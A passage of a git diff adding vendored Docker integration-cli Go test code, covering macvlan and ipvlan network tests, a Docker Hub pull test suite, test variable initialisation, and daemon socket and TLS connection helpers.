+	// Inspect and store the v6 address from specified container on the network dualstackl3
+	ip6 = inspectField(c, "second", "NetworkSettings.Networks.dualstackl3.GlobalIPv6Address")
+
+	// Verify connectivity across disparate subnets which is unique to L3 mode only
+	_, _, err = dockerCmdWithError("exec", "third", "ping", "-c", "1", strings.TrimSpace(ip))
+	c.Assert(err, check.IsNil)
+	_, _, err = dockerCmdWithError("exec", "third", "ping6", "-c", "1", strings.TrimSpace(ip6))
+	c.Assert(err, check.IsNil)
+
+	// Inspect the v4 gateway to ensure no next hop is assigned in L3 mode
+	ip4gw := inspectField(c, "first", "NetworkSettings.Networks.dualstackl3.Gateway")
+	c.Assert(strings.TrimSpace(ip4gw), check.Equals, "")
+	// Inspect the v6 gateway to ensure the explicitly specified default GW is ignored per L3 mode enabled
+	ip6gw := inspectField(c, "third", "NetworkSettings.Networks.dualstackl3.IPv6Gateway")
+	c.Assert(strings.TrimSpace(ip6gw), check.Equals, "")
+}
+
+func (s *DockerNetworkSuite) TestDockerNetworkIpvlanAddressing(c *check.C) {
+	// Ensure the default gateways, next-hops and default dev devices are properly set
+	testRequires(c, DaemonIsLinux, IPv6, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	dockerCmd(c, "network", "create", "--driver=macvlan", "--ipv6", "--subnet=172.28.130.0/24",
+		"--subnet=2001:db8:abca::/64", "--gateway=2001:db8:abca::254", "-o", "macvlan_mode=bridge", "dualstackbridge")
+	assertNwIsAvailable(c, "dualstackbridge")
+	dockerCmd(c, "run", "-d", "--net=dualstackbridge", "--name=first", "busybox", "top")
+	// Validate macvlan bridge mode defaults gateway sets the default IPAM next-hop inferred from the subnet
+	out, _, err := dockerCmdWithError("exec", "first", "ip", "route")
+	c.Assert(err, check.IsNil)
+	c.Assert(out, checker.Contains, "default via 172.28.130.1 dev eth0")
+	// Validate macvlan bridge mode sets the v6 gateway to the user specified default gateway/next-hop
+	out, _, err = dockerCmdWithError("exec", "first", "ip", "-6", "route")
+	c.Assert(err, check.IsNil)
+	c.Assert(out, checker.Contains, "default via 2001:db8:abca::254 dev eth0")
+
+	// Verify ipvlan l2 mode sets the proper default gateway routes via netlink
+	// for either an explicitly set route by the user or inferred via default IPAM
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.140.0/24", "--gateway=172.28.140.254",
+		"--subnet=2001:db8:abcb::/64", "-o", "ipvlan_mode=l2", "dualstackl2")
+	assertNwIsAvailable(c, "dualstackl2")
+	dockerCmd(c, "run", "-d", "--net=dualstackl2", "--name=second", "busybox", "top")
+	// Validate ipvlan l2 mode defaults gateway sets the default IPAM next-hop inferred from the subnet
+	out, _, err = dockerCmdWithError("exec", "second", "ip", "route")
+	c.Assert(err, check.IsNil)
+	c.Assert(out, checker.Contains, "default via 172.28.140.254 dev eth0")
+	// Validate ipvlan l2 mode sets the v6 gateway to the user specified default gateway/next-hop
+	out, _, err = dockerCmdWithError("exec", "second", "ip", "-6", "route")
+	c.Assert(err, check.IsNil)
+	c.Assert(out, checker.Contains, "default via 2001:db8:abcb::1 dev eth0")
+
+	// Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "--ipv6", "--subnet=172.28.160.0/24", "--gateway=172.28.160.254",
+		"--subnet=2001:db8:abcd::/64", "--gateway=2001:db8:abcd::254", "-o", "ipvlan_mode=l3", "dualstackl3")
+	assertNwIsAvailable(c, "dualstackl3")
+	dockerCmd(c, "run", "-d", "--net=dualstackl3", "--name=third", "busybox", "top")
+	// Validate ipvlan l3 mode sets the v4 gateway to dev eth0 and disregards any explicit or inferred next-hops
+	out, _, err = dockerCmdWithError("exec", "third", "ip", "route")
+	c.Assert(err, check.IsNil)
+	c.Assert(out, checker.Contains, "default dev eth0")
+	// Validate ipvlan l3 mode sets the v6 gateway to dev eth0 and disregards any explicit or inferred next-hops
+	out, _, err = dockerCmdWithError("exec", "third", "ip", "-6", "route")
+	c.Assert(err, check.IsNil)
+	c.Assert(out, checker.Contains, "default dev eth0")
+}
+
+func (s *DockerSuite) TestDockerNetworkMacVlanBridgeNilParent(c *check.C) {
+	// macvlan bridge mode - dummy parent interface is provisioned dynamically
+	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	dockerCmd(c, "network", "create", "--driver=macvlan", "dm-nil-parent")
+	assertNwIsAvailable(c, "dm-nil-parent")
+
+	// start two containers on the same subnet
+	dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--net=dm-nil-parent", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// intra-network communications should succeed
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestDockerNetworkMacVlanBridgeInternalMode(c *check.C) {
+	// macvlan bridge mode --internal containers can communicate inside the network but not externally
+	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	dockerCmd(c, "network", "create", "--driver=macvlan", "--internal", "dm-internal")
+	assertNwIsAvailable(c, "dm-internal")
+	nr := getNetworkResource(c, "dm-internal")
+	c.Assert(nr.Internal, checker.True)
+
+	// start two containers on the same subnet
+	dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--net=dm-internal", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// access outside of the network should fail
+	result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8")
+	c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true})
+
+	// intra-network communications should succeed
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestDockerNetworkIpvlanL2NilParent(c *check.C) {
+	// ipvlan l2 mode - dummy parent interface is provisioned dynamically
+	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "di-nil-parent")
+	assertNwIsAvailable(c, "di-nil-parent")
+
+	// start two containers on the same subnet
+	dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--net=di-nil-parent", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// intra-network communications should succeed
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestDockerNetworkIpvlanL2InternalMode(c *check.C) {
+	// ipvlan l2 mode --internal containers can communicate inside the network but not externally
+	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "--internal", "di-internal")
+	assertNwIsAvailable(c, "di-internal")
+	nr := getNetworkResource(c, "di-internal")
+	c.Assert(nr.Internal, checker.True)
+
+	// start two containers on the same subnet
+	dockerCmd(c, "run", "-d", "--net=di-internal", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--net=di-internal", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// access outside of the network should fail
+	result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8")
+	c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true})
+	// intra-network communications should succeed
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestDockerNetworkIpvlanL3NilParent(c *check.C) {
+	// ipvlan l3 mode - dummy parent interface is provisioned dynamically
+	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24",
+		"--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "di-nil-parent-l3")
+	assertNwIsAvailable(c, "di-nil-parent-l3")
+
+	// start two containers on separate subnets
+	dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-nil-parent-l3", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-nil-parent-l3", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// intra-network communications should succeed
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestDockerNetworkIpvlanL3InternalMode(c *check.C) {
+	// ipvlan l3 mode --internal containers can communicate inside the network but not externally
+	testRequires(c, DaemonIsLinux, IpvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	dockerCmd(c, "network", "create", "--driver=ipvlan", "--subnet=172.28.230.0/24",
+		"--subnet=172.28.220.0/24", "-o", "ipvlan_mode=l3", "--internal", "di-internal-l3")
+	assertNwIsAvailable(c, "di-internal-l3")
+	nr := getNetworkResource(c, "di-internal-l3")
+	c.Assert(nr.Internal, checker.True)
+
+	// start two containers on separate subnets
+	dockerCmd(c, "run", "-d", "--ip=172.28.220.10", "--net=di-internal-l3", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--ip=172.28.230.10", "--net=di-internal-l3", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// access outside of the network should fail
+	result := dockerCmdWithTimeout(time.Second, "exec", "first", "ping", "-c", "1", "-w", "1", "8.8.8.8")
+	c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true})
+	// intra-network communications should succeed
+	_, _, err := dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+}
+
+func (s *DockerSuite) TestDockerNetworkMacVlanExistingParent(c *check.C) {
+	// macvlan bridge mode - empty parent interface containers can reach each other internally but not externally
+	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	netName := "dm-parent-exists"
+	out, err := createMasterDummy(c, "dm-dummy0")
+	//out, err := createVlanInterface(c, "dm-parent", "dm-slave", "macvlan", "bridge")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	// create a network using an existing parent interface
+	dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0", netName)
+	assertNwIsAvailable(c, netName)
+	// delete the network while preserving the parent link
+	dockerCmd(c, "network", "rm", netName)
+	assertNwNotAvailable(c, netName)
+	// verify the network delete did not delete the predefined link
+	out, err = linkExists(c, "dm-dummy0")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	deleteInterface(c, "dm-dummy0")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+}
+
+func (s *DockerSuite) TestDockerNetworkMacVlanSubinterface(c *check.C) {
+	// macvlan bridge mode -  empty parent interface containers can reach each other internally but not externally
+	testRequires(c, DaemonIsLinux, MacvlanKernelSupport, NotUserNamespace, NotArm, ExperimentalDaemon)
+	netName := "dm-subinterface"
+	out, err := createMasterDummy(c, "dm-dummy0")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	out, err = createVlanInterface(c, "dm-dummy0", "dm-dummy0.20", "20")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	// create a network using an existing parent interface
+	dockerCmd(c, "network", "create", "--driver=macvlan", "-o", "parent=dm-dummy0.20", netName)
+	assertNwIsAvailable(c, netName)
+
+	// start containers on 802.1q tagged '-o parent' sub-interface
+	dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--net=dm-subinterface", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+	// verify containers can communicate
+	_, _, err = dockerCmdWithError("exec", "second", "ping", "-c", "1", "first")
+	c.Assert(err, check.IsNil)
+
+	// remove the containers
+	dockerCmd(c, "rm", "-f", "first")
+	dockerCmd(c, "rm", "-f", "second")
+	// delete the network while preserving the parent link
+	dockerCmd(c, "network", "rm", netName)
+	assertNwNotAvailable(c, netName)
+	// verify the network delete did not delete the predefined sub-interface
+	out, err = linkExists(c, "dm-dummy0.20")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	// delete the parent interface which also collects the slave
+	deleteInterface(c, "dm-dummy0")
+	c.Assert(err, check.IsNil, check.Commentf(out))
+}
+
+func createMasterDummy(c *check.C, master string) (string, error) {
+	// ip link add <dummy_name> type dummy
+	args := []string{"link", "add", master, "type", "dummy"}
+	ipLinkCmd := exec.Command("ip", args...)
+	out, _, err := runCommandWithOutput(ipLinkCmd)
+	if err != nil {
+		return out, err
+	}
+	// ip link set dummy_name up
+	args = []string{"link", "set", master, "up"}
+	ipLinkCmd = exec.Command("ip", args...)
+	out, _, err = runCommandWithOutput(ipLinkCmd)
+	if err != nil {
+		return out, err
+	}
+	return out, err
+}
+
+func createVlanInterface(c *check.C, master, slave, id string) (string, error) {
+	// ip link add link <master> name <master>.<VID> type vlan id <VID>
+	args := []string{"link", "add", "link", master, "name", slave, "type", "vlan", "id", id}
+	ipLinkCmd := exec.Command("ip", args...)
+	out, _, err := runCommandWithOutput(ipLinkCmd)
+	if err != nil {
+		return out, err
+	}
+	// ip link set <sub_interface_name> up
+	args = []string{"link", "set", slave, "up"}
+	ipLinkCmd = exec.Command("ip", args...)
+	out, _, err = runCommandWithOutput(ipLinkCmd)
+	if err != nil {
+		return out, err
+	}
+	return out, err
+}
+
+func linkExists(c *check.C, master string) (string, error) {
+	// verify the specified link exists, ip link show <link_name>
+	args := []string{"link", "show", master}
+	ipLinkCmd := exec.Command("ip", args...)
+	out, _, err := runCommandWithOutput(ipLinkCmd)
+	if err != nil {
+		return out, err
+	}
+	return out, err
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go
new file mode 100644
index 0000000000..df52cae1a4
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_hub_pull_suite_test.go
@@ -0,0 +1,90 @@
+package main
+
+import (
+	"os/exec"
+	"runtime"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func init() {
+	// FIXME. Temporarily turning this off for Windows as GH16039 was breaking
+	// Windows to Linux CI @icecrime
+	if runtime.GOOS != "windows" {
+		check.Suite(newDockerHubPullSuite())
+	}
+}
+
+// DockerHubPullSuite provides an isolated daemon that doesn't have all the
+// images that are baked into our 'global' test environment daemon (e.g.,
+// busybox, httpserver, ...).
+//
+// We use it for push/pull tests where we want to start fresh, and measure the
+// relative impact of each individual operation. As part of this suite, all
+// images are removed after each test.
+type DockerHubPullSuite struct {
+	d  *Daemon
+	ds *DockerSuite
+}
+
+// newDockerHubPullSuite returns a new instance of a DockerHubPullSuite.
+func newDockerHubPullSuite() *DockerHubPullSuite {
+	return &DockerHubPullSuite{
+		ds: &DockerSuite{},
+	}
+}
+
+// SetUpSuite starts the suite daemon.
+func (s *DockerHubPullSuite) SetUpSuite(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	s.d = NewDaemon(c)
+	err := s.d.Start()
+	c.Assert(err, checker.IsNil, check.Commentf("starting push/pull test daemon: %v", err))
+}
+
+// TearDownSuite stops the suite daemon.
+func (s *DockerHubPullSuite) TearDownSuite(c *check.C) {
+	if s.d != nil {
+		err := s.d.Stop()
+		c.Assert(err, checker.IsNil, check.Commentf("stopping push/pull test daemon: %v", err))
+	}
+}
+
+// SetUpTest declares that all tests of this suite require network.
+func (s *DockerHubPullSuite) SetUpTest(c *check.C) {
+	testRequires(c, Network)
+}
+
+// TearDownTest removes all images from the suite daemon.
+func (s *DockerHubPullSuite) TearDownTest(c *check.C) {
+	out := s.Cmd(c, "images", "-aq")
+	images := strings.Split(out, "\n")
+	images = append([]string{"rmi", "-f"}, images...)
+	s.d.Cmd(images...)
+	s.ds.TearDownTest(c)
+}
+
+// Cmd executes a command against the suite daemon and returns the combined
+// output. The function fails the test when the command returns an error.
+func (s *DockerHubPullSuite) Cmd(c *check.C, name string, arg ...string) string {
+	out, err := s.CmdWithError(name, arg...)
+	c.Assert(err, checker.IsNil, check.Commentf("%q failed with errors: %s, %v", strings.Join(arg, " "), out, err))
+	return out
+}
+
+// CmdWithError executes a command against the suite daemon and returns the
+// combined output as well as any error.
+func (s *DockerHubPullSuite) CmdWithError(name string, arg ...string) (string, error) {
+	c := s.MakeCmd(name, arg...)
+	b, err := c.CombinedOutput()
+	return string(b), err
+}
+
+// MakeCmd returns an exec.Cmd command to run against the suite daemon.
+func (s *DockerHubPullSuite) MakeCmd(name string, arg ...string) *exec.Cmd {
+	args := []string{"--host", s.d.sock(), name}
+	args = append(args, arg...)
+	return exec.Command(dockerBinary, args...)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go b/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go
new file mode 100644
index 0000000000..3559bfdbb7
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_test_vars.go
@@ -0,0 +1,165 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strconv"
+
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/pkg/reexec"
+)
+
+var (
+	// the docker client binary to use
+	dockerBinary = "docker"
+	// the docker daemon binary to use
+	dockerdBinary = "dockerd"
+
+	// path to containerd's ctr binary
+	ctrBinary = "docker-containerd-ctr"
+
+	// the private registry image to use for tests involving the registry
+	registryImageName = "registry"
+
+	// the private registry to use for tests
+	privateRegistryURL = "127.0.0.1:5000"
+
+	// TODO Windows CI. These are incorrect and need fixing into
+	// platform specific pieces.
+	runtimePath = "/var/run/docker"
+
+	workingDirectory string
+
+	// isLocalDaemon is true if the daemon under test is on the same
+	// host as the CLI.
+	isLocalDaemon bool
+
+	// daemonPlatform is held globally so that tests can make intelligent
+	// decisions on how to configure themselves according to the platform
+	// of the daemon. This is initialized in docker_utils by sending
+	// a version call to the daemon and examining the response header.
+	daemonPlatform string
+
+	// windowsDaemonKV is used on Windows to distinguish between different
+	// versions. This is necessary to enable certain tests based on whether
+	// the platform supports it. For example, Windows Server 2016 TP3 did
+	// not support volumes, but TP4 did.
+	windowsDaemonKV int
+
+	// daemonDefaultImage is the name of the default image to use when running
+	// tests. This is platform dependent.
+	daemonDefaultImage string
+
+	// For a local daemon on Linux, these values will be used for testing
+	// user namespace support as the standard graph path(s) will be
+	// appended with the root remapped uid.gid prefix
+	dockerBasePath       string
+	volumesConfigPath    string
+	containerStoragePath string
+
+	// experimentalDaemon tell whether the main daemon has
+	// experimental features enabled or not
+	experimentalDaemon bool
+
+	// daemonStorageDriver is held globally so that tests can know the storage
+	// driver of the daemon. This is initialized in docker_utils by sending
+	// a version call to the daemon and examining the response header.
+	daemonStorageDriver string
+
+	// WindowsBaseImage is the name of the base image for Windows testing
+	// Environment variable WINDOWS_BASE_IMAGE can override this
+	WindowsBaseImage = "microsoft/windowsservercore"
+
+	// isolation is the isolation mode of the daemon under test
+	isolation container.Isolation
+
+	// daemonPid is the pid of the main test daemon
+	daemonPid int
+
+	daemonKernelVersion string
+)
+
+const (
+	// DefaultImage is the name of the base image for the majority of tests that
+	// are run across suites
+	DefaultImage = "busybox"
+)
+
+func init() {
+	reexec.Init()
+	if dockerBin := os.Getenv("DOCKER_BINARY"); dockerBin != "" {
+		dockerBinary = dockerBin
+	}
+	var err error
+	dockerBinary, err = exec.LookPath(dockerBinary)
+	if err != nil {
+		fmt.Printf("ERROR: couldn't resolve full path to the Docker binary (%v)\n", err)
+		os.Exit(1)
+	}
+	if registryImage := os.Getenv("REGISTRY_IMAGE"); registryImage != "" {
+		registryImageName = registryImage
+	}
+	if registry := os.Getenv("REGISTRY_URL"); registry != "" {
+		privateRegistryURL = registry
+	}
+	workingDirectory, _ = os.Getwd()
+
+	// Deterministically working out the environment in which CI is running
+	// to evaluate whether the daemon is local or remote is not possible through
+	// a build tag.
+	//
+	// For example Windows to Linux CI under Jenkins tests the 64-bit
+	// Windows binary build with the daemon build tag, but calls a remote
+	// Linux daemon.
+	//
+	// We can't just say if Windows then assume the daemon is local as at
+	// some point, we will be testing the Windows CLI against a Windows daemon.
+	//
+	// Similarly, it will be perfectly valid to also run CLI tests from
+	// a Linux CLI (built with the daemon tag) against a Windows daemon.
+	if len(os.Getenv("DOCKER_REMOTE_DAEMON")) > 0 {
+		isLocalDaemon = false
+	} else {
+		isLocalDaemon = true
+	}
+
+	// TODO Windows CI. This are incorrect and need fixing into
+	// platform specific pieces.
+	// This is only used for a tests with local daemon true (Linux-only today)
+	// default is "/var/lib/docker", but we'll try and ask the
+	// /info endpoint for the specific root dir
+	dockerBasePath = "/var/lib/docker"
+	type Info struct {
+		DockerRootDir     string
+		ExperimentalBuild bool
+		KernelVersion     string
+	}
+	var i Info
+	status, b, err := sockRequest("GET", "/info", nil)
+	if err == nil && status == 200 {
+		if err = json.Unmarshal(b, &i); err == nil {
+			dockerBasePath = i.DockerRootDir
+			experimentalDaemon = i.ExperimentalBuild
+			daemonKernelVersion = i.KernelVersion
+		}
+	}
+	volumesConfigPath = dockerBasePath + "/volumes"
+	containerStoragePath = dockerBasePath + "/containers"
+
+	if len(os.Getenv("WINDOWS_BASE_IMAGE")) > 0 {
+		WindowsBaseImage = os.Getenv("WINDOWS_BASE_IMAGE")
+		fmt.Println("INFO: Windows Base image is ", WindowsBaseImage)
+	}
+
+	dest := os.Getenv("DEST")
+	b, err = ioutil.ReadFile(filepath.Join(dest, "docker.pid"))
+	if err == nil {
+		if p, err := strconv.ParseInt(string(b), 10, 32); err == nil {
+			daemonPid = int(p)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_utils.go b/vendor/github.com/docker/docker/integration-cli/docker_utils.go
new file mode 100644
index 0000000000..749e4b3357
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_utils.go
@@ -0,0 +1,1607 @@
+package main
+
+import (
+	"bufio"
+	"bytes"
+	"crypto/tls"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"net"
+	"net/http"
+	"net/http/httptest"
+	"net/http/httputil"
+	"net/url"
+	"os"
+	"os/exec"
+	"path"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/httputils"
+	icmd "github.com/docker/docker/pkg/integration/cmd"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/stringutils"
+	"github.com/docker/go-connections/tlsconfig"
+	units "github.com/docker/go-units"
+	"github.com/go-check/check"
+)
+
+func init() {
+	cmd := exec.Command(dockerBinary, "images", "-f", "dangling=false", "--format", "{{.Repository}}:{{.Tag}}")
+	cmd.Env = appendBaseEnv(true)
+	out, err := cmd.CombinedOutput()
+	if err != nil {
+		panic(fmt.Errorf("err=%v\nout=%s\n", err, out))
+	}
+	images := strings.Split(strings.TrimSpace(string(out)), "\n")
+	for _, img := range images {
+		protectedImages[img] = struct{}{}
+	}
+
+	res, body, err := sockRequestRaw("GET", "/info", nil, "application/json")
+	if err != nil {
+		panic(fmt.Errorf("Init failed to get /info: %v", err))
+	}
+	defer body.Close()
+	if res.StatusCode != http.StatusOK {
+		panic(fmt.Errorf("Init failed to get /info. Res=%v", res))
+	}
+
+	svrHeader, _ := httputils.ParseServerHeader(res.Header.Get("Server"))
+	daemonPlatform = svrHeader.OS
+	if daemonPlatform != "linux" && daemonPlatform != "windows" {
+		panic("Cannot run tests against platform: " + daemonPlatform)
+	}
+
+	// Now we know the daemon platform, can set paths used by tests.
+	var info types.Info
+	err = json.NewDecoder(body).Decode(&info)
+	if err != nil {
+		panic(fmt.Errorf("Init failed to unmarshal docker info: %v", err))
+	}
+
+	daemonStorageDriver = info.Driver
+	dockerBasePath = info.DockerRootDir
+	volumesConfigPath = filepath.Join(dockerBasePath, "volumes")
+	containerStoragePath = filepath.Join(dockerBasePath, "containers")
+	// Make sure in context of daemon, not the local platform. Note we can't
+	// use filepath.FromSlash or ToSlash here as they are a no-op on Unix.
+	if daemonPlatform == "windows" {
+		volumesConfigPath = strings.Replace(volumesConfigPath, `/`, `\`, -1)
+		containerStoragePath = strings.Replace(containerStoragePath, `/`, `\`, -1)
+		// On Windows, extract out the version as we need to make selective
+		// decisions during integration testing as and when features are implemented.
+		// eg in "10.0 10550 (10550.1000.amd64fre.branch.date-time)" we want 10550
+		windowsDaemonKV, _ = strconv.Atoi(strings.Split(info.KernelVersion, " ")[1])
+	} else {
+		volumesConfigPath = strings.Replace(volumesConfigPath, `\`, `/`, -1)
+		containerStoragePath = strings.Replace(containerStoragePath, `\`, `/`, -1)
+	}
+	isolation = info.Isolation
+}
+
+func convertBasesize(basesizeBytes int64) (int64, error) {
+	basesize := units.HumanSize(float64(basesizeBytes))
+	basesize = strings.Trim(basesize, " ")[:len(basesize)-3]
+	basesizeFloat, err := strconv.ParseFloat(strings.Trim(basesize, " "), 64)
+	if err != nil {
+		return 0, err
+	}
+	return int64(basesizeFloat) * 1024 * 1024 * 1024, nil
+}
+
+func daemonHost() string {
+	daemonURLStr := "unix://" + opts.DefaultUnixSocket
+	if daemonHostVar := os.Getenv("DOCKER_HOST"); daemonHostVar != "" {
+		daemonURLStr = daemonHostVar
+	}
+	return daemonURLStr
+}
+
+func getTLSConfig() (*tls.Config, error) {
+	dockerCertPath := os.Getenv("DOCKER_CERT_PATH")
+
+	if dockerCertPath == "" {
+		return nil, fmt.Errorf("DOCKER_TLS_VERIFY specified, but no DOCKER_CERT_PATH environment variable")
+	}
+
+	option := &tlsconfig.Options{
+		CAFile:   filepath.Join(dockerCertPath, "ca.pem"),
+		CertFile: filepath.Join(dockerCertPath, "cert.pem"),
+		KeyFile:  filepath.Join(dockerCertPath, "key.pem"),
+	}
+	tlsConfig, err := tlsconfig.Client(*option)
+	if err != nil {
+		return nil, err
+	}
+
+	return tlsConfig, nil
+}
+
+func sockConn(timeout time.Duration, daemon string) (net.Conn, error) {
+	if daemon == "" {
+		daemon = daemonHost()
+	}
+	daemonURL, err := url.Parse(daemon)
+	if err != nil {
+		return nil, fmt.Errorf("could not parse url %q: %v", daemon, err)
+	}
+
+	var c net.Conn
+	switch daemonURL.Scheme {
+	case "npipe":
+		return npipeDial(daemonURL.Path, timeout)
+	case "unix":
+		return net.DialTimeout(daemonURL.Scheme, daemonURL.Path, timeout)
+	case "tcp":
+		if os.Getenv("DOCKER_TLS_VERIFY") != "" {
+			// Setup the socket TLS configuration.
+			tlsConfig, err := getTLSConfig()
+			if err != nil {
+				return nil, err
+			}
+			dialer := &net.Dialer{Timeout: timeout}
+			return tls.DialWithDialer(dialer, daemonURL.Scheme, daemonURL.Host, tlsConfig)
+		}
+		return net.DialTimeout(daemonURL.Scheme, daemonURL.Host, timeout)
+	default:
+		return c, fmt.Errorf("unknown scheme %v (%s)", daemonURL.Scheme, daemon)
+	}
+}
+
+func sockRequest(method, endpoint string, data interface{}) (int, []byte, error) {
+	jsonData := bytes.NewBuffer(nil)
+	if err := json.NewEncoder(jsonData).Encode(data); err != nil {
+		return -1, nil, err
+	}
+
+	res, body, err := sockRequestRaw(method, endpoint, jsonData, "application/json")
+	if err != nil {
+		return -1, nil, err
+	}
+	b, err := readBody(body)
+	return res.StatusCode, b, err
+}
+
+func sockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) {
+	return sockRequestRawToDaemon(method, endpoint, data, ct, "")
+}
+
+func sockRequestRawToDaemon(method, endpoint string, data io.Reader, ct, daemon string) (*http.Response, io.ReadCloser, error) {
+	req, client, err := newRequestClient(method, endpoint, data, ct, daemon)
+	if err != nil {
+		return nil, nil, err
+	}
+
+	resp, err := client.Do(req)
+	if err != nil {
+		client.Close()
+		return nil, nil, err
+	}
+	body := ioutils.NewReadCloserWrapper(resp.Body, func() error {
+		defer resp.Body.Close()
+		return client.Close()
+	})
+
+	return resp, body, nil
+}
+
+func sockRequestHijack(method, endpoint string, data io.Reader, ct string) (net.Conn, *bufio.Reader, error) {
+	req, client, err := newRequestClient(method, endpoint, data, ct, "")
+	if err != nil {
+		return nil, nil, err
+	}
+
+	client.Do(req)
+	conn, br := client.Hijack()
+	return conn, br, nil
+}
+
+func newRequestClient(method, endpoint string, data io.Reader, ct, daemon string) (*http.Request, *httputil.ClientConn, error) {
+	c, err := sockConn(time.Duration(10*time.Second), daemon)
+	if err != nil {
+		return nil, nil, fmt.Errorf("could not dial docker daemon: %v", err)
+	}
+
+	client := httputil.NewClientConn(c, nil)
+
+	req, err := http.NewRequest(method, endpoint, data)
+	if err != nil {
+		client.Close()
+		return nil, nil, fmt.Errorf("could not create new request: %v", err)
+	}
+
+	if ct != "" {
+		req.Header.Set("Content-Type", ct)
+	}
+	return req, client, nil
+}
+
